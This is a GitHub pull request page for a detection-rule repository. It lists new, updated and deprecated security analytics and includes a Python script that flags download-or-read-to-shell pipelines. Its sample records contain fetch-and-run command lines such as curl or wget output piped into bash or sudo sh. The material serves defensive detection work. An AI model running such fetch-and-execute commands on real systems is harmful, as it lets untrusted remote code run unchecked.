
New Rules & Updates - Oct 25 #3726

Merged
patel-bhavin merged 21 commits into develop from newrules-oct
Oct 24, 2025

Conversation

@nasbench (Contributor) commented Oct 15, 2025

This PR introduces a couple of new analytics, fixes some reported issues and adds multiple updates. See below for details:

Adding Missing Data Sources

The first set of updates is to a bunch of rules that had a DS defined but not linked in the rule. Now this is fixed (the rest of the rules either are experimental and/or have no DS defined).

  • O365 Elevated Mailbox Permission Assigned
  • O365 Mailbox Folder Read Permission Assigned
  • O365 Mailbox Folder Read Permission Granted
  • Processes Tapping Keyboard Events
  • Suspicious PlistBuddy Usage via OSquery
  • Windows Debugger Tool Execution
  • Windows Process Writing File to World Writable Path
  • Detect ARP Poisoning
  • Detect IPv6 Network Infrastructure Threats
  • Detect Port Security Violation
  • Detect Rogue DHCP Server
  • Detect Traffic Mirroring
  • Windows Create Local Account

New Rules

  • Advanced IP or Port Scanner Execution
  • Windows Defender ASR or Threat Configuration Tamper
  • Windows NirSoft Tool Bundle File Created
  • Windows PowerShell Process Implementing Manual Base64 Decoder
  • Windows Process Execution From RDP Share
  • Windows PsTools Recon Usage
  • Windows WBAdmin File Recovery From Backup
  • File Download or Read to Pipe Execution - This is a rewrite, a combination and a more generic logic of the 2 deprecated rules wget/curl (see deprecated section)

Rule Updates / Issues Fixes

  • Updated Detect New Local Admin account by adding the raw field TargetUserName in the condition in order to provide a generic fix for [BUG] Detect New Local Admin Account #3730
  • Updated Dump LSASS via procdump with additional flags and process names
  • Updated Powershell Disable Security Monitoring with additional Cmdlets and their aliases, as well as enhanced the logic to be more accurate
  • Updated Web or Application Server Spawning a Shell by adding wildcards to some process names to be more generic
  • Overhauled the logic of Windows AdFind Exe to be more generic and capture more common abuse vectors as reported by various threat intel sources.
  • Updated Windows EventLog Recon Activity Using Log Query Utilities by adding OriginalFileName fields for better coverage.
  • Enhanced file paths in Windows File Transfer Protocol In Non-Common Process Path and Windows Mail Protocol In Non-Common Process Path in order to reduce FP
  • Enhanced the logic of Windows SSH Proxy Command by adding new variants of execution.
  • Added local IP filters for Detect Regasm with Network Connection, Detect Regsvcs with Network Connection, LOLBAS With Network Traffic,

Lookup Updates

  • cisco_secure_firewall_filetype_lookup - Added untruffled Arcan Door rule
  • is_nirsoft_software - Add wildcards and additional nirsoft tooling

Macro Updates

  • windows_shells - Reworked the logic to use the IN operator for ease of reading, also added powershell_ise, WindowsTerminal, wt and mshta

Deprecated Rules

  • Wget Download and Bash Execution
  • Curl Download and Bash Execution
  • W3WP Spawning Shell
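The "File Download or Read to Pipe Execution" rule above replaces two narrower wget/curl rules with one generic check. The script below is an added illustration of that detection idea, written for this page; it is not the project's rule, and the process-creation records, hosts, users and URLs in it are constructed. It splits a command line into pipeline stages on unquoted single `|` characters, skips wrapper programs such as `sudo`, and flags any stage that fetches or reads content (`curl`, `wget`, `cat`) when a later stage is a shell or script interpreter.

```python
import os
import shlex

# Constructed sample process-creation records (hypothetical hosts, users and URLs).
SAMPLE_EVENTS = [
    {"host": "web01", "user": "deploy",
     "cmdline": "curl -fsSL http://example.invalid/install.sh | bash"},
    {"host": "web01", "user": "deploy",
     "cmdline": "wget -qO- http://example.invalid/setup.sh | sudo -E sh -"},
    {"host": "build02", "user": "ci",
     "cmdline": "cat /tmp/staged.sh | /bin/bash"},
    {"host": "build02", "user": "ci",
     "cmdline": "curl -o /tmp/pkg.tar.gz https://example.invalid/pkg.tar.gz"},
    {"host": "db01", "user": "ops",
     "cmdline": "ps aux | grep nginx"},
    {"host": "db01", "user": "ops",
     "cmdline": "echo 'curl x | bash' | cat"},
    {"host": "db01", "user": "ops",
     "cmdline": "curl -s https://example.invalid/health || bash fallback.sh"},
]

SOURCES = {"curl", "wget", "cat"}          # programs that emit fetched/read content on stdout
SINKS = {"bash", "sh", "zsh", "dash", "ksh", "python", "python3", "perl"}
WRAPPERS = {"sudo", "env", "nohup", "nice"}  # launchers that precede the real program


def split_pipeline(cmdline):
    """Split a command line on unquoted single '|' characters.

    Quoted text is kept intact and '||' (logical OR) is not treated as a pipe.
    """
    stages, current, quote = [], [], None
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if quote:
            current.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            current.append(ch)
        elif ch == "|":
            if cmdline[i + 1:i + 2] == "|":
                current.append("||")
                i += 1
            else:
                stages.append("".join(current).strip())
                current = []
        else:
            current.append(ch)
        i += 1
    stages.append("".join(current).strip())
    return [s for s in stages if s]


def effective_command(stage):
    """Return the basename of the program a stage runs, skipping wrappers and their options."""
    try:
        tokens = shlex.split(stage)
    except ValueError:  # unbalanced quotes: treat the stage as opaque
        return ""
    while tokens and (tokens[0] in WRAPPERS or tokens[0].startswith("-") or "=" in tokens[0]):
        tokens.pop(0)
    return os.path.basename(tokens[0]) if tokens else ""


def download_or_read_to_pipe(cmdline):
    """Return (source_stage, sink_stage) when a download/read stage feeds a later interpreter, else None."""
    stages = split_pipeline(cmdline)
    commands = [effective_command(s) for s in stages]
    for i, src in enumerate(commands):
        if src not in SOURCES:
            continue
        for j in range(i + 1, len(commands)):
            if commands[j] in SINKS:
                return stages[i], stages[j]
    return None


def scan(events):
    """Run the check over process-creation records and return one alert per match."""
    alerts = []
    for event in events:
        hit = download_or_read_to_pipe(event["cmdline"])
        if hit:
            alerts.append({"host": event["host"], "user": event["user"],
                           "source": hit[0], "sink": hit[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']}/{alert['user']}: [{alert['source']}] -> [{alert['sink']}]")
```

Three of the seven constructed records match (the two downloads piped into a shell and the `cat`-to-`bash` read); the plain download to disk, the `ps | grep` pipeline, the pipe inside quotes and the `||` case do not. The check only sees literal pipelines: forms that pass fetched content through command substitution (`bash -c "$(curl …)"`) need separate logic, and in a real rule the parent process and user context are what keep legitimate installer one-liners from paging anyone.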

@nasbench nasbench added this to the v5.17.0 milestone Oct 15, 2025
@nasbench nasbench linked an issue Oct 20, 2025 that may be closed by this pull request
@nasbench nasbench linked an issue Oct 23, 2025 that may be closed by this pull request
@nasbench nasbench marked this pull request as ready for review October 23, 2025 18:26
@nasbench nasbench requested a review from ljstella as a code owner October 23, 2025 18:26
Comment thread detections/endpoint/advanced_ip_or_port_scanner_execution.yml Outdated
Comment thread detections/endpoint/file_download_or_read_to_pipe_execution.yml Outdated
@patel-bhavin (Contributor)

neat PR description and updates!

@patel-bhavin patel-bhavin merged commit 9fc8942 into develop Oct 24, 2025
4 checks passed
@patel-bhavin patel-bhavin deleted the newrules-oct branch October 24, 2025 21:19
